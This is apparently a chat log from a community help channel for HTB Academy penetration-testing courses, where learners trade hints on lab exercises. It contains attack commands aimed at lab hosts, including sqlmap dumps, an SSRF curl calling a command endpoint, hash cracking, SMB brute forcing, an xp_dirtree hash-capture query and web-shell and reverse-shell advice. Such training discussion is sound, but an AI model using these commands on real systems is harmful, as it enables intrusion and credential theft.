👍

password attacks medium was an interesting turn of events....

how well recognized is CREST?

they are partnered with HTB Academy

lol

I'm thinking after security+ I might as well to the CREST penetration testing skill path

it only would make sense

depending on if CREST is a good place to get penetration testing certs from

in terms of HR

I was wondering the same thing myself. If I am not mistaken, you need to get CPSA before getting CRT

CPSA is a multiple choice exam

after reading and all I think I go with comptia + security

it is more accepted and known by HR and companies looking for it

I ll go with CPTS then offensive sec certs

they are kind of the best but quite expensive when compared with others

Guys i have a confusion in "Using web proxies" Module (i.e. Repeating Requests

) Can someone assist me? Thanks

Unable to find the flog

which part

Hey, I'm working on the Active Directory Bloodhound module, and I'm having a problem uploading the zip in Bloodhound

getting this error:

I tried using Kali and PwnBox. Same error. I did some Googling and I think they used SharpHound.ps1. Can anybody get this to the right people to perhaps run the SharpHound.exe ingestor?

Okay, I just pimpmykali and used the "fix Bloodhound' option. Seems to be working now on my Kali! Nice!

Hey Folks, could anyone recommend a module that covers aws security? When I search for it it turns up a load of modules, then doesn’t mention it in the summary of the module 😂

As far as I know, there are currently no modules on the topic of AWS Security

Huh weird, it comes up as quoted text when you search for it

How about for general WebAppSec, I’ve done the basic ones

Cheers mate

There are many modules
Blind SQL Injection
HTTPs/TLS Attacks
File Inclusion
SQL Injection Fundamentals
SQLMap Essentials
Cross-Site Scripting (XSS)
Login Brute Forcing
Broken Authentication
Command Injections
Web Attacks
File Upload Attacks
Server-side Attacks
Session Security
Web Service & API Attacks
Introduction to Deserialization Attacks
Attacking Authentication Mechanisms
Introduction to NoSQL Injection

Cool you been looking into these, had been considering the deserialisation intro one, only a little was covered in starting point

I feel there’s tonnes more to learn there

As you now have the name of an employee, try to gather basic information about them, and generate a custom password wordlist that meets the password policy. Also use 'usernameGenerator' to generate potential usernames for the employee. Finally, try to brute force the SSH server shown above to get the flag.

plss help me with this question

Any solution to do the exercise with PetitPotam and PrintNightmare in Bleeding vulnerabitilies module, in AD section? NoPac seems to be the only tool to work weel

anyone can help with this

No. Read the #rules

Hi! I'm stuck at SSRF Exploitation Example. I managed to run the following command:

||curl -i -s "http://10.129.201.238/load?q=http://internal.app.local/load?q=http::////127.0.0.1:5000/runme?x=ls" ||

but whenever I try anything with a space, for example, the following command:

||curl -i -s "http://10.129.201.238/load?q=http://internal.app.local/load?q=http::////127.0.0.1:5000/runme?x=uname -a" ||

I get the following error returned:

||URL can't contain control characters. '/load?q=http::////127.0.0.1:5000/runme?x=uname -a' (found at least ' ')||

Does this mean that this way of doing it as described in the exercise is not the way to do it? Can somebody help me 🙂

@green bolt Spam that in every channel will just result in you getting a mute.

ok

so i have any doubt than how should i solve ?

You can either wait for a response or wait for a response but also google and find your answer in the mean time.

yes u are right but on google i can't find it

i know how to know ip page from cmd

Use the resources provided in the module

ok thanks

all those password list problems dont rely on rockyou etc

you need to create personalised username and password lists

(i.e. the point of the module)

Hi! Anyone know if with the "Silver Annual" plan I can access the Tier III and IV modules?

Or just until the Tier II.

Ok, that was my fear. I'm in doubt because there are a lot of Tier III modules that I would like to do too. Maybe is better to contract the Platinum subscription.

ping (url adress)

in cmd try

Solved it. It's way easier than I thought lol.

I can’t find fqdn of x.x.x.203 in footprinting module, I try many ways but can’t find it. Any clues ?

I try to finish the module ACTIVE DIRECTORY ENUMERATION & ATTACKS but I'm stucked on a question in the section AD Enumeration & Attacks - Skills Assessment Part I

I found an NTLM hash fdxxxxxxxxxxxxxxxxxxxxxxxxxxxx3a

Then, I used hashcat -m 1000 /tmp/hash.txt /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
But I didn't find anything.

What am I doing wrong?

in the Footprinting module > Cloud Resources > Google Search for AWS
intext:<text-covered> inurl:amazonaws.com

how to replicate this. text is covered. not sure what to search for

I need to confirm an answer from Introduction to active directory module >>Examining group policy section can i dm someone?

Module Name: Attacking Common Services

Section Name: Attacking SMB

i have run this cmd ~/Tool/CrackMapExec/cme smb 10.129.203.6 -u 'jason' -p pws.list --local-auth , but i got nothing. can i dm someone for help? (PS: i got it)

where is general

#welcome

I have spent almost a week on the one question, where is the students mail. I have found it......mail:/var/mail:/usr/sbin/nologin
I have chopped that path up many different ways as well, to get it to work. I have tried both the etc command and the env command. I have tried everything. Im not trying to rag but I think you should take that questioon off there, I have wasted alot of time with it. either its broken, or Im just not doing it right. here let me paste the whole line.
mail❌8:8:mail:/var/mail:/usr/sbin/nologin

define path, is that different than pwd? What am I suppose to learn from this question. Thats the main goal anyways. I think ive got the searching path thing down pretty well ll, ls -a , pwd, cat /etc/passwd, uname -a,. Ive been down every file on the students shell

Hello, everyone i'm trying to complete Skill Assessment for "File Upload Attacks" when i'm trying to upload the file it's using get request to file upload and just name is being sent to server side. any hint where to start. i can see upload.php in script.js but don't know what to do ?

Hey can u help me with know what everybody do in my wifi

Spy other in wifi

try read source code of upload.php

How by sending GET Request ?. I'm kind a confuse ?

in the module it shows methods to read source code like php wrappers

So i need to craft a POST request from scratch. because i can not see any post request going on, when i try to upload file.

i think if you can upload an image to find source code
look at section (Limited File Uploads)

Thanks mate.

Is there someone that has finished the ACTIVE DIRECTORY ENUMERATION & ATTACKS module? I am stucked on trying to crack a NTLM hash since 3 days 😦

If you're meant to crack it, it should usually crack within the first few minutes.

You're right but I have not any other idea. Basically, I am on a question that tells me to find a password, and all I have is the NTLM hash. I searched for files that could contain a password. I also search for it on the description of the user: nothing). Have you completed this module?

DM me

You need to find the DNS zone that contains multiple subdomains. Then you will need to brute force a particular second level subdomain i.e *.blog.example.com.

I found dev, mail, app

Dev contains multiple subdomains

Thank for you answer

Make sure you use a wordlist that resembles being ferocious and forceful, like a lion.

Hi guys, i'm stuck at Internal Password Spraying - from Windows. I try to find the user with password 'Winter2022.'. When I run the ps script as shown in the module it just doesn't write anything to the outputfile ;/ Can anyone help me?

Hello guys, I just join this community, want to try learn from here, I'm already stuck at the first module,
It ask me " Based on the commands executed, what is likely to be the operating system flavor of this instance?
Linux htb-uxufv3qysx 6.0.0-12parrot1-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.0.12-1parrot1 (2023-01-12) x86_64 GNU/Linux "
And I obviously answer :
"The operating system flavor of this instance is likely to be a version of Debian Linux. The text "Debian 6.0.12-1parrot1" in the output of the command gives an indication that this particular version of Linux is based on Debian and version 6.0.12-1parrot1."

But its not working, wont give me right.. help me please!

Name and section of module?

i would like to subscribe to the student plan but i currently dont have access to it and i dont know what an academic email is

Introduction
like second section

Take a peek at the hint button, next to the question. It should give you what you need.

Dm

Which section?

yeah sure

Academic email is an email given to you by your school

Okay thank u

I want to sent a file from my linux host to a windows host in a internal network (which offer ssh)

im using proxychains scp text.txt mlefay@172.16.5.35:C:\Users\mlefay\Desktop

[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] Strict chain ... 127.0.0.1:9050 ... 172.16.5.35:22 ... OK
mlefay@172.16.5.35's password:
scp: Connection closed

but the upload does not work

is my syntax correct?

can someone help me with password attacks-Network Services, i got all the questions except the one about rdp, i tried using the given passwords and username lists with crackmapexec and hyrdra but got nothing

Hi all I hope you are having a good day. I have got a question about a question from Password Attacks Module:
Create a mutated wordlist using the files in the ZIP file under "Resources" in the top right corner of this section. Use this wordlist to brute force the SSH password for the user "sam". Once successful, log in and submit the contents of the flag.txt file as your answer.
I have created the file but there is 94044 tries to be done. Is this how its suppose to be

guys

I need help

Here is my problem

I'm using a windows computer and my other hack computer isn't working anymore but I wanna continue hacking, so I need to download linux on a windows computer but im worried that it will erase all my stuff from windows

so I downloaded Virtual Box but what is its use?

what do i do guys

I NEED HELP

pls

if this isnt related to a module, i would take this general chat, or community help... VirtualBox allows you to run multiple OS at the same time.

bro

I on't have the general channel

it doesn't show up on my screen

you need to verify yourself

didn't i already did that

where do i verify

#welcome

thx

Hey can someone help me 2 install open vpn and configure it for labs? thx

what module?

Im using parrot os

Like i mean i can't find where 2 donwload openvpn

When i donwload it it saves at .exe

and im on a linux machine

open terminal and type sudo apt install openvpn

OK

Done tysm

Also another problem is that when i try to use telnet it gives me this error telnet: Unable to connect to remote host: Connection timed out

This is not related to Academy modules. Please don't have this conversation in here

@flint depot why not visit YouTube

Ok , sorry

I dont understand how people can see Academy modules chat when not verified, but cant see the general chat...isnt that backwards

Because gen chat is somewhat contained... And more ruthless to people being not smart "hack this pls"

idk

Hello, I'm stuck at SQLmap essentials ~ Attack Tuning. I have to get the content of table "flag6" - "Detect and exploit SQLi vulnerability in GET parameter col having non-standard boundaries". I use this command sqlmap http://167.99.195.247:32676/case6.php?col=id --random-agent --batch --dump --prefix='`)' --level=5 --risk=3 but it doesn't give me any injections. Could anyone give me a hint please?

@flint depot https://youtu.be/8mns5yqMfZk

yea

thanks

Is there any way to put the academy on spanish?

@flint depot no problem

I mean, to be totally honest thats the best response to those messages 😆

solved it, i did put the correct prefix on dc but didnt use it

Reread that section. There's a part of it that tells you exactly what you need to do

👍

You don't need GO in mssqlclient

One question, how could I've known that the prefix was ´)'? that was the hint

A bit of educated guessing.

but there could be so many possibilites right?

Yes

Why doesn't SQLmap work if I use ?col=1 instead of ?col=id ?

Because col=1 is not the correct amount of columns. Idk why it works with col=id

Count the number of columns on the oage lol

well there are 5 columns

Well sometimes sqlmap has issues detecting how many columns there are. So you need to tell it how many columns there are

--union-cols=5 right?

Yes

Cuz again, there are 5 columns

thanks, i got the flag

I believe it's because id may be the name of the column

Or some SQL nonsense

Well yea, logically that's the only thing that makes sense

But actually no. Why would that work.

SQL is something I want to dive deep into, but also don't

Like even just to understand some of the why's

Lmao. SQL is... SQL. I had a professor for my intro to databases class last semester who said "If your a bad database administrator, you'll make yourself vulnerable to SQL Injection"

I got up and walked out of the room

can i dm you?

I mean, I guess, but I can't promise I'll get back to you right away

have you done this section?

Yes

It exist any module that teach you to program or I have to learn that on other websites?

what u meant by program?

depends on that

For example phyton or powershell

One does not simply "Learn to program"

Ik

theres a module on python and powershell as well ig

Ok thanks

Hackthebox probably won’t be the best place to learn to program. Pick up python, and watch a course on freecodecamp.

^^

Then just screw around and learn the ins and outs

Make games, make applications, start a github, etc.

You learn programming by doing.

You learn tech in general by doing. Dosent matter what specific subject you chose to focus on

Running into an issue with the medium lab on the enumeration with nmap module

can i dm you for help? mssqlclient.py WIN-02/mssqlsvc:XXXXXXXX@10.129.203.12 -db flagDB i can't access via mssqlclient (PS. I got it)

Despite following examples given in the prior page regarding version detection against filtered ports, the port remains filter regardless of the source port I specify

use the --windows-auth flag

I hope there comes a module for xxe :/

Have you looked at this module?
https://academy.hackthebox.com/module/details/134

No, thx tho

Hello everyone, i'm trying to complete Skills Assessment - File Upload Attacks when i'm trying to upload file and every time i get Only images are allowed i tried all of Content-Type and and added magic byes nothing working. Any Hint ?

Upload a regular image and then change the content. But not the Magic Byte. Then it should work

How do i upload image because i tried uploading it via "Contact Us" form but it's not taking as POST request. File is being uploaded as GET request with no file content.

hi everybody, I am at the nmap hardlab, I found the missing port and I am trying to get the version, but had no luck so far. I also tried with netcat, but could not connect. Someone any more hints on this one? I would love some support on this one

Why doesn't sqlmap http://143.110.166.29:32448/case9.php?id=1&uid=1947156619 --randomize=uid --batch --dump work insted of sqlmap -u "http://143.110.166.29:32448/case9.php?id=1&uid=1947156619" --randomize=uid --batch --dump?

Wait, you uploaded an image and get an error message and now you're asking where you can upload an image? I am confused

cuz in the first one you didnt supply the -u flag so sqlmap dosnt know what its attacking

but i didn't need the -u flag at most of them before

I crafted a POST request after seeing "/contact/upload.php" on script.js as I had done in the earlier section "Limited File Uploads"

Hi guys, i'm having problems with the section brute forcing cookies of Broken authentication module? Any help?

https://dontasktoask.com/

I'm trying to fuzz the role with some Seclists, and embed to the cookie to encode it, but no results, i'm using burp intruder: add prefix and sufix, and encode it (ascii hex - base64); but no results

Then upload a file there

Try to read and understand the source code.

I'm confused about how to bypass the mime-type filter.

DM

This question is confusing. I know…
In this case the role is || super ||

Appreciate u man

Like a lion? 😂🤔

I think saying like a lion might make him look for a wrong list. But the descriptors definitely a good hint

lions are pretty fierce though

After banging my head against the keyboard and getting some help from @west canopy i finally managed to pass the Predictable Reset Token section on Broken Authentication module, these are some tips that will nudge in the right direction and avoid frustration.

Use the script bellow for Q1

pastecode.io/s/m58pup5y

The server runs on GMT time, most of the trouble that i had with online epoch converters is that they would convert to my timezone not GMT, and the time needs to be in milliseconds, otherwise it won't work.

Pay attention to that, otherwise you won't get the flag.

For Q2 the temp password follows the same pattern both for the htbuser and the htbadmin and is encoded.
You need to discover how it was encoded and if it was double, triple or more encoded.

You can use a cyberchef or any other online, i recommend dencode.com for easy of usage.

After you get the cleartext, change what it needs to be changed then encode it back to login.

How do I get the final flag at the SQLmap Essentials Assessment? I found the a***.php site with the ID data param but it doesn't seem to be injectable. I found no other attack vector. Could someone give me a hint?

i dont know if this is a hint, but did you save that burp request as a file and run sqlmap with -r sometimes that helps, and I have had better luck that way

So in Shells & Payloads- The Live Engagement module, I am using EternalBlue to try to get to the server :

but everytime i run it says

Exploit completed, but no session was created.

will try it

I tried different payloads but i keep getting the same thing

filename.req <--- ippsec saves it like this, so thats how i have been doing it

There's more than 1 exploit for MS17-010

When I do sqlmap ... --data='id=1', is that considered JSON? no right? this is: sqlmap --data='{"id":1}'?

Yea. You have to do it the second way

i dont think thats needed if you run the file.req with sqlmap

ok thanks

Yea. If you save the request it'll already be formatted properly

think i got the injection, but why is typing sqlmap it so slow?

types character by character

Cuz its doing a time based injection

Yes, it's painfully slow. No, there's nothing you can do about it

Ok 😦

well that was khm awkward 😄

Ty for the hint

Np

The flag is slowly comin up ^^

It's probably because in your first example the URL contains special bash characters, e.g., &. While the second has the URL wrapped in quotes meaning those characters are interpreted literally.

yea i think thats it, thanks 🙂

& has special meaning in the shell. I would recommend doing some linux command line basics

in certain cases you can use something like --threads 8 to speed it up

dude, i spent hours doing this Footprinting - medium lab, and I have tried the same thing multiple times--- reset the server twice and then it works

Hi,

could someone help with Assessment 2 for noSQL injection, please?

I have tried much payloads and have no idea, how to pwn it, please help

i could try, haven't done any academy stuff but i'm quite familiar with nosqli

What's the issue you're having?

I have tried to execute payloads, but it doesnt work

you need ip for testing or what ?

what do you mean by "execute payloads"?
ip for testing? 😄 what? 😄

afaik most of the modules is setup in a way that you can interact with them from htb vpn

ok, i will try

you mean, I can connect to ip, which was given me for testing (HTB lab)

i stil don't get what exactly you mean by that. Are you using htb vpn to access the vulnerable environment?

like can you see the stuff that you're supposed to be hacking?

no, i don't use vpn

^

Are you using the pwnbox?

yes, i mean it, is it possible ?

no

You are using your own vm?

no

So you are using the virtual machine from the website

right now, i have swithed to my windows pc without vpns or so on

and i have opened it

That may be why if you it an IP that is 10.x.x.x you need to attack it using a VM through the VPN or through the pwnbox

it's web application

ip is 161...*

oh it's publicly available?

yes

you don't need vpn then

If it's a web app you should be fine to access it wherever. But it is not recommended to use a Windows machine to do any of the enumeration or anything like that through tools

yes, i also have kali instance on that pc

(not kali VM)

So you are dual booting with Kali

yes, something like this

Were there any template payloads that they gave you, or examples that you can follow? Sometimes if you're given a template command, you need to change the IP to match the target so it can execute

that's the last task - no additional info, except it has noSQL injection and ip

Within the module I mean

within the module - I have tried each payload

and it doesn't work

Any help on Skills Assessment - Broken Authentication?

Hello, I have a biiit problem in Login Brute Forcing module, Service Skills Assessment, the last task. I know the user, and try to bruteforce FTP localhost using rockyou-30, but still that doesn't help

could someone give me a nudge with Footprinting - Medium. I'm logged in as Administrator, think im stuck due to lack of MSSQL exp...

whats the exact issue you're having?

||I have looked around for HTB user password, but I dont see anything...not sure if I just dont know how to manuever around in MSSQL or what.. i have looked all through the db||

i'm not familiar with any of the academy stuff so i would probably need more context on that. I assume you've pwned db somehow and now you're at the point where you're supposed to get user flag. Have you tried doing code exec directly? ie xp_cmdshell

nope..didnt even know how to do that...i will look it up on google

maybe try using stuff like payload all the things

that's somehow educative on sqli or just direct db interaction

@iron plaza need help? 😄

lool yea and I was typing an essay and deleted it when I saw your message

that's the reason why ctrl + x exists 🙂

just ctrl + a, ctrl +x, type new message, ctrl + v 😄

With regards to the second question in the Shells & Payloads' Live Engagement I have uploaded the ||cmd.war|| file from ||laudanum ||in the manager's section then went to|| .../cmd/cmd.jsp|| and placed my commands for cmd... I got hit with systeminfo and whoami but when I try dir or anything else it gives error so how I do go about browsing the C:\ directory or am I missing something?

what kind of error?

like random java error from the site

does just dir work?

seems the shell is not a full fledged shell

no it does not

hmm

is it in vpn or publicly available?

vpn and can only be accessed by rdp-ing to the foothold first

It's in the sql db

what if you do ping /n 5 your.box while looking at the traffic (do you get hit?)? have you tried using reverse shell?

Ok ill look around again—ty

sorry for misleading info

No worries

If you're RDP in it's a bit easier

the module does require me to upload a reverse shell which I did and got it accepted hence how i was able to get hit with systeminfo and whoami

rev shell is not the same thing as cmd exec payload

Yup, thats what i did

rev shell -> you get a session back to your box
cmd exec -> http://box/cmd.jsp?cmd=whoami

Navigating the sql ui is a bit of a pain

Ill open my eyes and look again 😂

sorry my bad it was a shell ... the upload section accepts a .WAR file

so you have a rev shell?

no I dont have a rev shell I only get the cmd exec

ok, i thought that's the case. At that point you likely want to get a rev shell for ease of use but there might be issues with the actual shell execution because you're having issues using dir. I would try to carefully look at the error message you get while using dir and then possibly compare it to something like dir c:\. If you manage that to work somehow, i'd get a rev shell afterwards

thinking about it, you can possibly also create a payload that's just a rev shell itself and not a cmd exec payload, i assume you've used msfvenom to generate the payload. If that's the case you just use different payload when generating and that should be it to get a rev shell more easily

I probably have to tinker with it ... The only other thing I can think of is uploading another type of shell and relabel it as a WAR file through burpsuite

yeah, as i've said you can try uploading actual rev shell payload instead of cmd exec payload

thanks ... will try that

Hey guys. im having an issue on the nmap firewall medium lab. is it asking for the version number of the DNS service or just the version name? im able to get the version number of just about every other service except the DNS

is there anyone that could point me in the right direction?

Consider which protocol DNS uses by default

could also slow down the number of packets your sending

think with -t switch

ive done a UDP scan with version detection and tried a version detection script. same as the others

i can try slowing it down ill let you know what happens

seems to be the same

Which script did you use?

i tried quite a few. do i need to use the filter to put them up here?

Try it with || dns-nsid ||

thats one that i tried.

got the name. not the number. name was wrong

DM

yo mods, how is my name "Alpha" breaking the rules?

Wrong section to be asking but, please read the #rules

rule 10 is so.. messed up

did you figure it out?

I did. issue was with my Parrot tools. tried on pwnbox and it worked

huh, nmap should work the same everywhere regardless of distro used

Most likely just needed to reset the VPN connection

If it worked on pwnbox and not on vm

idk. ran it on my VM instance and the script didnt run. ran the same command on pwnbox and the script ran

i was able to get everything else except that specific script to run

guess i need to do some updates

did it somehow error out?

no. just didnt do anything

Probably update

acted like i just did a normal udp scan with no zcripts

updating now

Or just version difference, did you catch the nmap version on pwnbox

i wouldn't think a slight version difference could cause nmap to not scan dns

both are 7.92

is your vpn working just fine on your box?

and you were able to scan it just fine ¯_(ツ)_/¯

(can you ping the box just fine?)

yes. all scans worked as they should. just not the script

sorry not that particular script

interesting, no clue what that's about

Weird

im gonna work on it before continuing. if its not working now it could cause me issues later. thanks everyone for all the help. im sure ill be back here soon lol

if you really want to try to figure out what the issue is, you could use verbose/debug flags on nmap or look at the flowing traffic, that could possibly help

i just may do that too.

Finally got it! Man, I was so focused on something else

Check if the script is even present on your VM. It may not be present at all

Or watch the HTB AMA video. There is also this question

Hey Bunny, could i get some help on the Broken Auth Skills Assessment? I'm having some trouble on figuring what to do next

Hello can someone please help me figure out why redis for redeemer isn’t working

When I ping the server, I get Pong I full connect with it but the second I type a command to pull or see data from the server the server stops

sure, DMme

well it is there. i can see it in the /usr/share/nmap/scripts folder and i can cat it out and it shows a script. maybe i just need a reboot

Redeemer is a #boxes question; to see that channel- verify your HTB account in #bot-commands per #welcome

i think someone was asking about that recently as well in here, isn't it really part of academy? i don't know myself, haven't done any academy stuff

It's not

HTB standard site w/boxes is separate from academy, different accounts - it would be cool if they would merge them

i thought it was more like starting point boxes vs regular boxes - it's pretty much the same from my point of view

I told you the better place to ask your question

This channel is for modules on htb academy

Oh sorry I just saw it and thank you

okay i searched the forums for answers and still could not figure it out, zero issues with thm vpn and connecting so i don't think i am doing anything wrong. problem is it says both lab and starting point are connected but i can't even ping the damn box.. whats up? not a paying member yet, are these dead machines?? wtf?

also switched from udp to tcp, nothing..

Take a step back; what is the machine you're trying to attack, what module is it on, if it's related to the #starting-point boxes on the main site check there

hmmm

Also you need to be on the htb VPN, benefit of the doubt that's what you meant

hi

it does connect, i think i am trying to access paid shit idk

perhaps that is why i cannot ping box

If it's not a 10.x.x.x format then it may be a web server you're trying to access, in which case it will be formatted as ip:port

ok guys update from the issue earlier. I moved over to my kali box and was having the same exact issue. but i noticed i was using the TCP VPN connection. I then downloaded a fresh UDP connection file and connected that way. reran the exact same command that worked on the pwn box and was able to get the script to get the bind.version to show up. idk if this will help anyone else having the issue or prove im an idiot but hey thats what i discovered

If it is a webpage then try navigating through your web browser

er

But you're not telling us what module or content you're attempting

Starting point machines are free on the htb main site

So it shouldn't be an issue of "paid content" but you're freaking out and not actually providing much info aside from "I can't connect" which really doesn't help

not freaking out lol, many ctf platforms to pop

you are giving useless info though, @mild sky

how about actually answer him?

settle down

go dictate elsewhere

Cool won't help you then

It's also possible the box is not able to be pinged at all, sometimes that is the case

But accessible via other means

I said this to someone a few days ago, and I'll say it again here. Nobody is obligated to help you. If someone takes the time to try to help you sort out your issue the least you can do is be nice to them. They get nothing out of helping you and are doing so solely to be nice. If you decide to be an ass you're not gonna get help, simple as that

Anyway that's all the help that can be offered with the limited information provided

99% of the time with content, it's a user issue not a box issue

this is true

mmmk

nice place you guys have here

:^)

It is nice

As stated, without much other information not much we can do to assist you

it's okay i'm doing other ctf's anyways, figured i sign up to htb is all

Just stop bothing lol. After reading your conversation I'm convinced he's just trolling

Same

If you're still connected to a different VPN that may be an issue btw

nah, ran sudo killall openvpn then reconnected and still same issue, ill look more into later it's no big deal

Just throwing darts at the dartboard

So, I was able to solve the “enumerate the SMTP service even further and find the username that exists on the system” I did this using the smtp-user-enum tool. And yet, for some unknown reason to me, they all showed up as “no result” so then I went an manually VRFY each user via telnet and one of them finally showed code 252 🙂 …could someone explain to me why this happened? Just wondering why the smtp-user-enum displayed the answer as no result 😕

cool, are you making writeups?

What was the commend you used?

Did you use the provided wordlist?

Writeups for any modules above teir 0 are strictly forbidden

I doubt they even know what academy is tbh tux

Fair point

Sounds like they're stuck on the starting point box

God, they really gotta put this channel behind verification

But seeing as they probably don't have reading comprehension: they probably didn't read #welcome

🤷‍♂️ honestly I couldn't care less. They clearly showed they don't want help

The server needs some time to react. There is a parameter in smtp-user-enum for this.
The default value is too fast and the server cannot respond to the request. Therefore you get this answer

Ah yea, that's it. Been a while since I did that module

Ohhhh, I see...Is there any way to change such default value? Im just curious that's all.

https://www.kali.org/tools/smtp-user-enum/

^

hmmm I see, apparently it only waits for 5< seconds for a reply by default...so that's why! 😅 well, now we know

Yeah telnet is a slowwww service

I think that w argument that is most common is 15

guys do u face VPN issues ?

Small (timesaver) for the Password module HARD please ! - for the Johanna account i realise i need to use the hashcat applied custom rules to the password list in the resources - but did you also apply the password policy rules from earlier in the section to reduce the size of the mutated password list? i.e. remove shorter than 8, remove no special chars, remove no numbers ? thx

Got it, all good, always post before waiting long enough lol

footprinting hard lab was fun, better than the medium

Ya big loading times

Anyone available to assist with the flag.txt location on Attacking Common Applications - Skills Assessment II please? I've tried searching with ||find / -name flag.txt 2>/dev/null|| and ||find / -name flag* 2>/dev/null||, but I'm not finding it. Are we supposed to priv esc here?

omg I finally completed all tasks on the IMAP/POP3 module...man, accessing those emails for the flag was a bit confusing...I just wasn't used to those imap commands at all...but i finally got it...after 5 hours 😩

Maybe it has some chars at start *flag*

@compact garnet next time try with evolution

Hello, I have a biiit problem in Login Brute Forcing module, Service Skills Assessment, the last task. I know the user, and try to bruteforce FTP localhost using rockyou-30, but still that doesn't help

@quasi moth I am on that selection and think u will use the password list that u created

Hmmm, I'll try this one

Yeap give it a try

how good is a successful evil-winrm login on administrator for passwd lab hard

Hello! Anyone working with the attacking common services modules! the attacking smb section!

do you have a specific question about the exercise or in general you are seeking to do it with other person as well?

Im stuck in a part of the exercise, Ive tried some things but running out of ideas!

There are like 3 questions, mind sharing on which one of them you are stuck?

I`m trying to find the password for the user, but I brute force with the resource list and get nothing... I tried to download the id_rsa file through the NULL session but I get access denied...

Im looking for the enum4linux-ng.py that the cheatsheet mentions but I cant find it in github...

You have the username and you have a potential password list, use them

I used them but it`s doesnt find any matching password...

I tried both hydra and crackmapexec...

I tried to both smb and ssh protocol

I must be doing something wrong...

The password is there, work on your commands

there must be something else than just typing the commands....

If I use crackmapexec against the target with the password list provided in the resources of the module I should get the password.... I tried many times and I get nothing...

it is very important how you craft your command

crackmapexec smb 10.129.56.219 -u jason -p ./pass.txt

I will check other ways to craft it...

I will try with .list instead of .txt

a machine could have a hostname, and that hostname might be required to be used for certain actions

I have the host name ATTCSVC-LINUX

I haven`t use crackmap without the ip...

Im reading the manual and I cant find anywhere the hostname option....

I can use a -d ...

go for it then

Got it!

Now I`m looking for the command to use the private key I got!

any useful guide where these commands appear?!?!

man ssh

Got it!!!

Thaaaaanks!!!!

Hi

Can I get some help with "Footprinting lab - medium"?
||I have a shell and currently interacting with sqlcmd but I don't have permissions to view "accounts" database. I know I am close but there is something I am missing. ||

pm if you want!

Sure, thanks

I'm doing the the Windows Priv Escalation Skills Assessment Part 1
But I cant ping the target machine
100% packet loss
Anyone with that problem too?

In Attacking Common Applications - Attacking GitLab, is there any hint to what users wordlist to use? I think I've used everyone in /usr/share/seclists/Usernames, and now at the xato ones. But I have to pause and resume every time the box times out. I'm doing the attack through Burpsuite. I've found some valid usernames, but nothing that is accepted as the answer.

Try one of the unconventional wordlists in that directory and it should work

I can't ping either. Is it still broken for you?

yea

I went to the #1024429874246590575 and I have seen that they could be down for maintenance

ahhh okay. I guess that explains why it took me a while to connect over vpn too

Hi,
I am again blocked on the file upload module.
It is one of the least complicated modules and yet I am still stuck ...
In the section filter type.
I found an authorized extension, I use the double extension.
I have a content-type which is an image and I added the MIME.
The shell is well uploaded but instead of executing the php code it displays it in Burp and in the browser it tells me that there is an error in the file.

The content of your web request and the Content-Type are mismatched. GIF8 != JPEG

I have the same with the same extension and content-type.
I have try many request with many extension.
The only MIME accepted i have found is GIF8

Dm

no spoilers please

still no connection

same can't connect to any modules

O

i am new how tto yuse

hash

means

Hi, Im stucked in Attacking common services - Attacking DNS module. Can somebody give me a hint?

What exactly you're stuck on?

I have found subdomains but Im not able to transfer attack those names

I guess that's what I have to do but question is not so clear for me

Did you add inlanefreight.htb to your /etc/hosts? You could either try to get a zone transfer with dig based on the name servers you have gathered or you could bruteforce the subdomains with subbrute

yes I add every discovered domains in /etc/hosts and I axfr attacked every domains but nothing.

Can I DM you?

yeah sure!!

i am new

how i sumbit root flag

i'm stuck on that too, are you on meow

@toxic sedge i'm stuck on that too, are you on meow

i know

how todo

do windows key +r

Please don't have this conversation in this channel. It's not in the slightest bit related ti HTB Academy modules

ok

and type machine ip adress

@graceful rampart although this is coming up as Academy modules?

Yes. This channel is for academy modules. You guys are discussing starting point machines which are not a part of htb academy

still the same

Yo

Who wants to playe server siege

1v1

#battlegrounds

Check #1024429874246590575 many servers are undergoing maintenance

extended maintenance*

Hello! Anyone working with the attacking SQL section?!

whats your question

Im trying to steal the hash but I cant get the command right...

I type the command in the sql... and then in my pawnbox happens nothing...

How do I even know if I typing the right command...

Are you getting a new line when you hit enter?

Are you ending the SQL query with ;

I`m using the mssqlclient.py, when I type any of the commands with ;

it`s not working

the mysql doesnt work I dont know why

Unless you show us a screenshot or an error message there isn't much anyone can do to help you

"it's not working" leaves a lot open to interpretation

I know! sorry!

I type this in the sql

There's an extra period at the end of that IP

and then this in my pawnbox

Main thing is that I dont know if it should work... Im trying to follow the section...

Yes. Youredoing it right. You have an extra period in the IP in your SQL command. It should be EXEC master..xp/dirtree '\\10.129.74.243\share'

I dont see any "share" folder created in my machine... its kind of awkward that I will work

this is not the IP that you should use

That too

But there's also an extra period

Tux did you finish the Broken Authentication Module? If so, could you give me a nudge on the right direction on the Skills Assessment section? I've been stuck at enumerating users and can't seem to find any.

I tried with my IP but it doesn`t work...

following the examples in the section of the module will help you go through, carefully go through them in order to understand the methodology and tools

try to visualise what needs to happen, once you've managed to do that

you will be able to get the desired result

They don`t explain much the commands they use... I assume "something" called share must be created in my machine...

neither responder or impacket work...

both sql command examples have a description what will happen, even if its a short one

I think I got it

hey guys, i need a little help with the bash scripting module.
Submit the echo statement that would print "www2.inlanefreight.com" when running the last "Arrays.sh" script.
Can anyone help out with the answer format?

HTB will not allow me to logg in even though it my first time today to try to logg in. I keep getting the message about new users only being allowed to log in once a day.

never mind. It suddenly let me in.

Hey am doing File Transfers, am on the Windows File Transfer Methods, on the question "Upload the attached file named upload_win.zip to the target using the method of your choice. Once uploaded, RDP to the box, unzip the archive, and run "hasher upload_win.txt" from the command line. Submit the generated hash as your answer.". I managed to upload the file I manged to unzip it, but when am running hasher I get "User do not have permission to read the file.". Is it the way i uploaded the file or should i escalate privileges to be able to run hasher?

Hello,
In the active Infrastructure identification module, how do I add the vhosts?
In which module do I see that?

I'm absolutely stuk on the Password Attacks module, section Password Reuse / Default Passwords

Hello again! I`m trying to unhash the password, but with hashcat I get this...

The hex means it`s zipped?!

I found the users sam, kira and will. That's it. I cannot figure out how to proceed.

or I should use another wordlist...

from which module is this?

Attacking common services, attacking SQL

Search the Internet for standard passwords for MySQL

How did you get this hash? DM me

I don't know what I'm missing. I already googled and foot r*** as a default user without a password. But it doesn't work.

Hello,
In the active Infrastructure identification module, how do I add the vhosts?
